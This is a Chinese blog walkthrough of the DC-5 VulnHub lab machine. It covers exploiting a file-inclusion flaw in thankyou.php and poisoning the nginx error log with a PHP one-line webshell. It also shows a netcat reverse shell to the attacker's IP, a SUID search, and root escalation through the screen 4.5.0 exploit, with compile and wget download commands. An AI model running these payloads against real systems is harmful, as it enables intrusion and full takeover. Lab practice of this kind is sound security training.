dc5靶机攻略

最新推荐文章于 2024-11-26 22:53:51 发布
最新推荐文章于 2024-11-26 22:53:51 发布
阅读量62 收藏
点赞数
分类专栏: 靶机系列 文章标签: 服务器 前端 linux 学习方法 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/133978901
版权
文章描述了一次渗透攻击过程中,利用thankyou页中的动态参数执行shell脚本,包括nginx错误配置文件的访问,一句话木马的尝试,以及通过find命令寻找高权限文件并提权的过程。作者还涉及到了文件编译和传输,最终目标是获取root权限。
摘要由CSDN通过智能技术生成

dc5

扫描

image-20231022203335494

image-20231022203415028

image-20231022204616780

渗透

在thankyou页中,可以发现日期随着刷新不断变化

image-20231022205225096

刚才目录爆破的时候有个footer页日期同样变化

image-20231022205321306

在thankyou页查看源码,发现标签部分即为footer,猜测此处为执行了什么脚本,可以利用

回到thank页,发现url中类似问号接参数,像文件包含

将问号后参数更改

http://10.4.7.148/thankyou.php?file=/etc/passwd

image-20231022205531535

发现可以执行

nginx的错误配置文件在/var/log/nginx/error.log

在url中写入一句话木马,貌似没有成功,使用bp抓包写入

<?php $var=shell_exec($_GET['cmd']);echo $var?>

image-20231022211303996

然后执行一句话木马

?file=/var/log/nginx/error.log&cmd=nc -e/bin/sh 10.4.7.138 12138

image-20231022211536338

连接成功

image-20231022211616424

提权

find / -perm -4000 2>/dev/null

使用find找一下高权文件

此处发现screen 4.5.0

image-20231022212015334

kali中搜索一下

image-20231022212113118

下载41154.sh到本地

如图该执行文件分为三部分,需要将其单独拿出来编译

image-20231022212545928

编译语句脚本中有写,但是需要改一下文件路径,我就是都放在了root下

image-20231022213000647

因此我的编译语句即为

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c

image-20231022213150725

随后使用kali开启http服务,将这三个文件传到靶机的/tmp目录下

靶机中使用wget获取

wget http://10.4.7.138:6789/libhax.so
wget http://10.4.7.138:6789/rootshell
wget http://10.4.7.138:6789/use.sh

image-20231022213515278

此处我失败了,然后我全都放到centos7编译一遍,并且修改了一下use.sh

image-20231022214640455

如此保存后退出才行

随后再次重复操作执行,获取root权限

image-20231022215151943

flag仍然是在/root下

如此保存后退出才行

随后再次重复操作执行,获取root权限

flag仍然是在/root下

image-20231022215214606

order libra
关注
专栏目录
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC系列靶机5通关教程
weixin_58954236的博客
09-17 258
信息收集主机发现 netdiscouver端口扫描 nmap目录爆破 dirsearch漏洞利用bp抓包分析数据包,测试到有文件包含漏洞木马上传,查看日志反弹shellpython交互shell。
DC-5靶场实战
qq_42754807的博客
03-28 889
DC-5靶场实战
VulnHub靶机 DC-5 打靶 渗透测试详细过程
rumil的博客
04-18 1262
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
DC-5靶机攻略
weixin_47311099的博客
07-16 793
DC-5靶机通关攻略 信息收集 主机发现 nmap -sP 192.168.64.0/24 -oN nmap_sp 目标主机ip地址为:192.168.64.129 端口扫描 nmap -A 192.168.64.129 -oN namp_a 发现80 访问80端口 发现只有Contact页面有用, 尝试提交内容 刷新发现底部时间变化 推测这里存在文件包含 目录扫描 御剑扫描 访问footer.php 刷新 确定thankyou.php包含了footer.php,存在文件包含,可以尝试文件
DC-5靶机渗透测试过程(个人学习
m0_59028058的博客
05-27 2184
访问thankyou.php,每次刷新网页会发现底部的时间也随之改变,但在其他网页刷新页面发现是一个静态页面,无论怎么刷新都并没有任何改变,猜测在thankyou.php文件中包含footer.php文件,存在着文件包含漏洞。它的日志会被记录在/var/log/nginx/error.log 或 /var/log/nginx/access.log。访问日志会发现我们写的一句话木马,中 '' 被编码,则需要在burp中抓包,在数据包中写入马上传。直接在url后面输入
DC-5靶机
mlws1900的博客
03-25 903
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。我们可以利用nginx日志写入一句话木马。切换nat模式,有问题全选重试和是,打到这了,我感觉这个配置我都不用写了,启动靶机如下图所示即可。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
DC-5靶机详细渗透流程
braty_的博客
01-27 2223
DC-5靶机渗透详细流程
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 2130
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
nfs服务器
wxhxmj的博客
11-22 538
服务端(192.168.217.129)客户端(192.168.217.130)
Linux宝塔部署wordpress网站更换服务器IP后无法访问管理后台和打开网站页面显示错乱
最新发布
星如雨落
11-26 147
htaccess文件,必须使用新建站点时创建的这2个文件。做好备份,替换掉老wordpress网站根目录下这2个文件。1.wordpress搬家后,在新服务器上,新建站点时,会创建4个默认文件,其中.user.ini文件和。登陆Linux宝塔面板,使用phpMyAdmin工具打开wordpress数据库。在wordpress数据库的wp_postmeta表中,在wordpress数据库的wp_options表中,在wordpress数据库的wp_users表中,_menu_item_url值。
华纳云:服务器网络延迟问题可能由哪些因素引起?
YOKEhn的博客
11-26 329
网络延迟问题可能由多种因素引起,包括硬件性能、网络配置、带宽限制、外部网络问题等。通过使用专业的工具进行诊断,分析服务器负载、带宽使用、路由器配置等因素,并结合适当的优化手段,可以有效排除并减少网络延迟,提高服务器响应速度和用户体验。首先检查服务器的CPU和内存使用情况,如果服务器负载过高,处理请求的速度可能会减慢,间接导致网络响应延迟。服务器网络延迟是许多在线服务性能问题的根源,可能会导致网站加载缓慢、数据传输延迟甚至服务中断。为了有效识别网络延迟的根源,首先需要使用一些工具来测试网络的各个环节。
Linux下一次性关闭多个同名进程
言之。
11-26 529
根据你的具体需求和系统环境,可以选择以上方法中的任意一种来一次性关闭多个同名的 Python 进程。根据进程名称终止进程。这种方法适用于进程名称唯一且不会误杀其他进程的情况。这些进程确实是你希望终止的。在终止进程之前,建议先列出所有匹配的进程,以确保不会误杀其他进程。:这种方法可能过于粗暴,会终止所有 Python 进程。的进程,可能包括其他重要的 Python 应用程序。会强制终止进程,可能导致数据丢失或状态不一致。选项会强制终止进程,可能导致数据丢失。选项会强制终止进程,需谨慎使用。
即时通讯服务器被ddos攻击了怎么办?
CDNcdn11的博客
11-25 711
即时通讯服务器被ddos攻击了怎么办?
GPU服务器厂家:为什么要选择 GPU 服务器
HPC_Evan的博客
11-22 594
GPU 这玩意儿有着超厉害的高度并行化架构,处理图像、视频还有大规模数据啥的,那就是小菜一碟,优势杠杠的!定制化 GPU 服务器就牛在这儿啦,它能根据具体的科研需求,挑出最合适的 GPU 型号和数量,再配上匹配的 CPU、内存、存储这些硬件设备,把性能和成本平衡得那叫一个完美,给科研项目打造出一个超棒的计算平台,资源利用效率超高的哦。定制化 GPU 服务器有不少厉害的招儿哦,它能把那些不必要的软件和服务都删掉,没用的端口也关掉,再加强访问控制,这样系统被攻击的风险就大大降低啦,科研数据安全妥妥有保障。
DevExpress WinForms中文教程:Data Grid - 使用服务器模式的大数据源和即时反馈?
需要界面开发、IDE工具研发中文教程资料的小伙伴,记得私信我~
11-25 1011
本文主要介绍如何使用DevExpress WinForms的Data Grid组件在代码中创建和管理数据以及应用数据注释属性,欢迎下载最新版组件体验!
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值